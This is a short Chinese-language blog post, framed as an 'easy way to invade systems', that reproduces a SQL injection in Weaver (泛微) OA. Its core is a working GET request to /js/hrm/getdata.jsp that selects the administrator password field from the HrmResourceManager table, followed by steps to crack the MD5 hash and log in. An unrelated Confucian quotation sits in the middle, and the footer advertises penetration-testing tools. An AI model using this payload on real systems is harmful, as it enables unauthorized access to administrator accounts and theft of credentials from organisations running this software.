黑客必知：揭秘泛微OA SQL注入漏洞，轻松入侵系统的绝佳方法！

admin V管理员 /2024年 /0 评论 /45 阅读

1007

此篇文章发布距今已超过47天，您需要注意文章的内容或图片是否可用！

有子曰：“其为人也孝弟，而好犯上者，鲜矣。不好犯上，而好作乱者，未之有也。君子务本，本立而道生。孝弟也者，其为仁之本与？”

漏洞复现

访问漏洞url：

构造payload：

GET /js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%20password%20as%20id%20from%20HrmResourceManager HTTP/1.1

查询HrmResourceManager表中的password字段

MD5解密，进行登录

文笔生疏，措辞浅薄，望各位大佬不吝赐教，万分感谢。

推荐站内搜索：最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……

宙飒天下